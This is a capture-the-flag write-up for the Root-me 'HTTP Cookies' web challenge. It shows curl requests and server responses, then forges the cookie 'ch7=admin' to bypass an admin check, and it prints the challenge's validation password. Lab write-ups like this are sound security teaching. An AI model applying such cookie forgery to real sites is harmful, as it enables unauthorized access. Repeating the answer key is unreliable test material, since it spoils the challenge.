Rootme HTTP Cookies
Root-me
HTTP Cookies
Bob create a script to gather user’s email…
So this challenge is about http cookies. Let’s request the challenge page with curl and dump the header.
curl -I http://challenge01.root-me.org/web-serveur/ch7/
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:08:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
There’s nothing. Let’s look at the source code.
curl http://challenge01.root-me.org/web-serveur/ch7/
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/></fieldset>
There’s a comment SetCookie("ch7","visiteur")
. I guess we’ll need to pass
ch7visiteur as cookie on the ?c=visiteur to see the emails ?
If we curl the url with the ?c=visiteur appended we see the cookie field
curl -i http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur;echo
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:16:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: ch7=visiteur
...
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/>You need to be admin</fieldset>
The cookie is set to visiteur and there’s a message at the end of the page that says that we need to be admin. If the cookie is setting who we “are”, let’s change it from visiteur to admin.
curl -i --cookie "ch7=admin" http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur;echo
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:14:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
<div>Validation password : ml-SYMPA</div></fieldset>
And there is it